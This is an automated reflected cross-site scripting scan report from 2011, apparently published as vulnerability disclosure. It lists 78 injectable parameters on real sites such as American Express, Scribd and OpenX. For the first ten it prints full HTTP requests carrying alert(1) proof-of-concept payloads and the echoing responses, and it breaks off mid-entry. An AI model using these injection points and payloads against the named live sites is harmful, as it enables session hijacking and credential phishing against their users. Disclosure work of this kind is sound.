XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10062011-02

Report generated by XSS.CX at Thu Oct 06 16:15:30 CDT 2011.


Loading

XSS.CX Anti-Phishing Research consumes Public Domain URL's to identify Points of Contact within an organization that would be sent Private Reports of Vulnerabilities. Its suggest that any published materials for Contact Us include Security Researchers seeking to report vulnerabilities observe URL http://technet.microsoft.com/en-us/security/ff852094.aspx as Best Practices for a Company to use as a baseline transaction. XSS.Cx doesn't use DOMAIN WHOIS, RADB or ARIN CIDR Point of Contact Records.

1. Cross-site scripting (reflected)

1.1. http://ak.p.openx.net/ak/bid/get [cb parameter]

1.2. http://app.work4labs.com/a/404596412628/tab [REST URL parameter 1]

1.3. http://as00.estara.com/as/InitiateCall2.php [template parameter]

1.4. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.5. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.6. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.7. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.8. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.9. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.10. http://bid.openx.net/json [c parameter]

1.11. http://careers.360i.com/jobdetails.asp [current_page parameter]

1.12. http://choices.truste.com/ca [c parameter]

1.13. http://choices.truste.com/ca [cid parameter]

1.14. http://choices.truste.com/ca [plc parameter]

1.15. http://choices.truste.com/ca [zi parameter]

1.16. http://clients.360i.com/ [name of an arbitrarily supplied request parameter]

1.17. http://dms.netmng.com/si/cm/tracking/si/CM/Tracking/ClickTracking.aspx [u parameter]

1.18. https://events.gsmiweb.com/creditcard_process.php [eventid parameter]

1.19. https://events.gsmiweb.com/creditcard_process.php [eventid parameter]

1.20. https://events.gsmiweb.com/member_login.php [eventid parameter]

1.21. https://events.gsmiweb.com/member_login.php [eventid parameter]

1.22. https://events.gsmiweb.com/pastevents.php [monthyear parameter]

1.23. https://events.gsmiweb.com/pastevents.php [monthyear parameter]

1.24. https://events.gsmiweb.com/pastevents.php [name of an arbitrarily supplied request parameter]

1.25. https://events.gsmiweb.com/pastevents.php [name of an arbitrarily supplied request parameter]

1.26. https://events.gsmiweb.com/process_payment.php [contactid parameter]

1.27. https://events.gsmiweb.com/process_payment.php [contactid parameter]

1.28. https://events.gsmiweb.com/subscribe.php [amountInDollars parameter]

1.29. https://events.gsmiweb.com/subscribe.php [discountamount parameter]

1.30. https://events.gsmiweb.com/subscribe.php [priceconfid parameter]

1.31. https://events.gsmiweb.com/subscribe.php [priceworkshopid parameter]

1.32. https://events.gsmiweb.com/subscribe.php [workshop_alphabet parameter]

1.33. http://flash.quantserve.com/quant.swf [lc parameter]

1.34. http://flash.quantserve.com/quant.swf [lc parameter]

1.35. http://ib.adnxs.com/ab [click parameter]

1.36. http://ib.adnxs.com/ab [pixel parameter]

1.37. https://online.americanexpress.com/myca/logon/us/action [DestPage parameter]

1.38. https://online.americanexpress.com/myca/logon/us/action [DestPage parameter]

1.39. https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp [Face parameter]

1.40. https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp [Face parameter]

1.41. https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp [Face parameter]

1.42. https://online.americanexpress.com/myca/tpintg/us/action [TPREDIRECT_URL parameter]

1.43. http://rs3.scribd.com/2/getvid.jsonp [callback parameter]

1.44. http://rs6.scribd.com/2/getvid.jsonp [callback parameter]

1.45. https://secure.wsj-asia.com/subscription/index.php [name of an arbitrarily supplied request parameter]

1.46. https://secure.wsj-asia.com/subscription/index.php [source parameter]

1.47. http://socialaxcess.com/wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php [src parameter]

1.48. http://support.scribd.com/attachments/token/0r1qoxsjyogmbvn/ [REST URL parameter 3]

1.49. http://support.scribd.com/attachments/token/1d05v67jplm55tp/ [REST URL parameter 3]

1.50. http://support.scribd.com/attachments/token/599fllhdxalyimd/ [REST URL parameter 3]

1.51. http://support.scribd.com/attachments/token/8hhgf6ydvilzyqs/ [REST URL parameter 3]

1.52. http://support.scribd.com/attachments/token/azo6pbskoyom0rk/ [REST URL parameter 3]

1.53. http://support.scribd.com/attachments/token/bnf0zmw7onpa5ww/ [REST URL parameter 3]

1.54. http://support.scribd.com/attachments/token/hdh23udvkqbhtpw/ [REST URL parameter 3]

1.55. http://support.scribd.com/attachments/token/t37e3dxobjw3x1a/ [REST URL parameter 3]

1.56. http://support.scribd.com/attachments/token/tiana38wf3sn2gu/ [REST URL parameter 3]

1.57. http://support.scribd.com/attachments/token/uovongz3v3j4r5n/ [REST URL parameter 3]

1.58. http://support.scribd.com/attachments/token/xp704tewqy91yw5/ [REST URL parameter 3]

1.59. http://support.scribd.com/home [name of an arbitrarily supplied request parameter]

1.60. http://support.scribd.com/widgets/async.json [REST URL parameter 2]

1.61. http://techaxcess.com/wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php [src parameter]

1.62. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

1.63. https://www.newsweeksubscriptions.com/FTcontrol/index.php [orderid parameter]

1.64. https://www.openforum.com/ [cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK parameter]

1.65. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.66. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

1.67. http://www.scribd.com/ [name of an arbitrarily supplied request parameter]

1.68. http://www.scribd.com/about [name of an arbitrarily supplied request parameter]

1.69. http://www.scribd.com/embeds/37405970/content [start_page parameter]

1.70. http://www1.amexnetwork.com/destinations [issuerName parameter]

1.71. http://www262.americanexpress.com/business-credit-cards/ [inav parameter]

1.72. http://www262.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

1.73. http://www262.americanexpress.com/business-credit-cards/ [view-all-business-cards&inav parameter]

1.74. http://www304.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

1.75. http://www.scribd.com/about [Referer HTTP header]

1.76. http://www.slideshare.net/slideshow/embed_code/9446735 [Referer HTTP header]

1.77. https://rewards.americanexpress.com/myca/loyalty/us/rewards/redirect/nonsecureredirect [SaneID cookie]

1.78. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]



1. Cross-site scripting (reflected)
There are 78 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ak.p.openx.net/ak/bid/get [cb parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ak.p.openx.net
Path:   /ak/bid/get

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e4c53<script>alert(1)</script>eaa7ecdfc6e was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ak/bid/get?alg=1&api=2&key=1&cb=window[%22DDyYS%22]e4c53<script>alert(1)</script>eaa7ecdfc6e&bstr=1317923821900mOg&enc=72c86854ea9aa50ba7838b71893ef1f1&d=http%3A%2F%2Fwww.scribd.com&y=&g=&pid=-1511178189&pcid=15&cs=1&fs=1&size=300x250 HTTP/1.1
Host: ak.p.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://s6.scribdassets.com/ad_refresher.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; s=fb2ae0b8-5ad4-4619-aeac-f41715174537; p=1317923830

Response

HTTP/1.1 200 OK
Content-Length: 59
Date: Thu, 06 Oct 2011 17:57:18 GMT
Connection: close

window["DDyYS"]e4c53<script>alert(1)</script>eaa7ecdfc6e={}

1.2. http://app.work4labs.com/a/404596412628/tab [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.work4labs.com
Path:   /a/404596412628/tab

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34f75'-alert(1)-'aa40d4a464b91be12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a34f75'-alert(1)-'aa40d4a464b91be12/404596412628/tab?signed_request=VsAiqSancRHx7bkUDJF48d5qKTFQ-5typ5vlteUrsUk.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImlzc3VlZF9hdCI6MTMxNzkyMzk4MSwicGFnZSI6eyJpZCI6IjU4NDIwODMwNDIiLCJsaWtlZCI6ZmFsc2UsImFkbWluIjpmYWxzZX0sInVzZXIiOnsiY291bnRyeSI6InVzIiwibG9jYWxlIjoiZW5fVVMiLCJhZ2UiOnsibWluIjowLCJtYXgiOjEyfX19 HTTP/1.1
Host: app.work4labs.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://static.ak.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://static.ak.facebook.com/platform/page_proxy.php?v=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 06 Oct 2011 17:59:56 GMT
Server: Apache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private, max-age=0
Expires: -1
Status: 404 Not Found
Vary: Accept-Encoding
Content-Length: 12155
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/2008/fbml"
...[SNIP]...
llowLinker', true],
['_setCampSourceKey', 'source'],
['_setCampMediumKey', 'source'],
['_setCampNameKey', 'source'],
['_setCampContentKey', 'data'],
['_trackPageview', '/workforus/a34f75'-alert(1)-'aa40d4a464b91be12/404596412628/tab?signed_request=VsAiqSancRHx7bkUDJF48d5qKTFQ-5typ5vlteUrsUk.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImlzc3VlZF9hdCI6MTMxNzkyMzk4MSwicGFnZSI6eyJpZCI6IjU4NDIwODMwNDIiLCJsaWtlZCI6ZmFsc2UsImFk
...[SNIP]...

1.3. http://as00.estara.com/as/InitiateCall2.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5086'%3balert(1)//17ea04b255b was submitted in the template parameter. This input was echoed as a5086';alert(1)//17ea04b255b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106286435&template=655713a5086'%3balert(1)//17ea04b255b&checklinkstatus=1 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www262.americanexpress.com/business-credit-cards/business-card-compare/popular-business-charge-credit-cards/29789?inav=menu_cards_sbc_comparecards
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZVLctswDEBvo108xJfkwmfpOK1nkkXcTuPevxQ-AGhtrKcHQgRB0ZgSJMVaBeUKBCJYS.Hj9v68fz8x2B9-b49fj39fV.UL1FS1rouOGVckycxCCeglS7eWpVwAhSXZlekAQnn7.Hx.X.f97z-3x3kvGez5eT.fCxSgJQZs5uv2-Plx77JUqhbZYUV2CJGJxCM7rMhEGo2aYQW2eQzwMRTHUMzG0bAZklRwmQFuajTVzGpU1lTPBrRfyim-tPG01gDhCwOgdbFmOEoGtEIGzBdkBC9kgBuOhqORaCQajAbd1CRspsMybYl8TAczbSncnDBNSayWbcAybUt7pR3cQDS.qZBr8YImBZfiPsL2JRXbzZNWcCOVGNxG45YZY.ZcXjPnLXPeMkvM3JaQ43qyrQAAqLd0kqXR7RW6vUK3wjQWxpBTqKOTj6PEYdxJ0cnmJOyINulQUW-wYpxtDdybuTFEnn3bH.D2YJ5XytRPs1yJcjue9tPstPYxMVwI2xfmxxkeyrbJYUIvacF6YeOaq0d2WJG.LxZMI9DmtcwANyWaYobP032ZAT5G4hiJRqPRMLescdab4Wg4GolGosnReD3a-o-cdBjmPw__

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:20 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Length: 10171
Content-Type: application/x-javascript


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['655713a5086';alert(1)//17ea04b255b'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...

1.4. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 2ed73<script>alert(1)</script>ae10276bf2f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=72ed73<script>alert(1)</script>ae10276bf2f&c2=7400849&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://blog.360i.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Thu, 20 Oct 2011 17:54:20 GMT
Date: Thu, 06 Oct 2011 17:54:20 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"72ed73<script>alert(1)</script>ae10276bf2f", c2:"7400849", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.5. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fbb69<script>alert(1)</script>9bea01bd19b was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849fbb69<script>alert(1)</script>9bea01bd19b&c3=1&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://blog.360i.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Thu, 20 Oct 2011 17:54:21 GMT
Date: Thu, 06 Oct 2011 17:54:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849fbb69<script>alert(1)</script>9bea01bd19b", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.6. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 8ef87<script>alert(1)</script>10d5d76217d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=18ef87<script>alert(1)</script>10d5d76217d&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://blog.360i.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Thu, 20 Oct 2011 17:54:21 GMT
Date: Thu, 06 Oct 2011 17:54:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"18ef87<script>alert(1)</script>10d5d76217d", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.7. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 24d00<script>alert(1)</script>6b9fa82522c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=24d00<script>alert(1)</script>6b9fa82522c&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://blog.360i.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Thu, 20 Oct 2011 17:54:22 GMT
Date: Thu, 06 Oct 2011 17:54:22 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"24d00<script>alert(1)</script>6b9fa82522c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



1.8. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload fc9c2<script>alert(1)</script>4389bcfaf50 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=fc9c2<script>alert(1)</script>4389bcfaf50&c6=&c7=http://blog.360i.com/ HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.slideshare.net/slideshow/embed_code/9446735
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Thu, 20 Oct 2011 17:54:23 GMT
Date: Thu, 06 Oct 2011 17:54:23 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"", c5:"fc9c2<script>alert(1)</script>4389bcfaf50", c6:"", c10:"", c15:"", c16:"", r:""});



1.9. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload f0baa<script>alert(1)</script>288f8043760 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=&c6=f0baa<script>alert(1)</script>288f8043760 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://blog.360i.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Thu, 20 Oct 2011 17:54:23 GMT
Date: Thu, 06 Oct 2011 17:54:23 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"", c5:"", c6:"f0baa<script>alert(1)</script>288f8043760", c10:"", c15:"", c16:"", r:""});



1.10. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c226a%3balert(1)//1c1163e31d6 was submitted in the c parameter. This input was echoed as c226a;alert(1)//1c1163e31d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /json?c=OXM_80732934013c226a%3balert(1)//1c1163e31d6&pid=8862bf15-73bf-3238-0daf-aaada5ed4033&s=300x250&f=0.7&cid=oxpv1%3A34-632-1929-2557-7261&hrid=bcadeb90ecd032a10ce7c4698135965c-1317923829&url=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F37405970%2F360i-s-Mobile-Marketing-Playbook HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://s6.scribdassets.com/ad_refresher.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; p=1317825372

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

(function(){var req={f:OXM_80732934013c226a;alert(1)//1c1163e31d6,o:null,w:3692500,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/javascript'\u003eisIE \u003d true;\u003c/s
...[SNIP]...

1.11. http://careers.360i.com/jobdetails.asp [current_page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://careers.360i.com
Path:   /jobdetails.asp

Issue detail

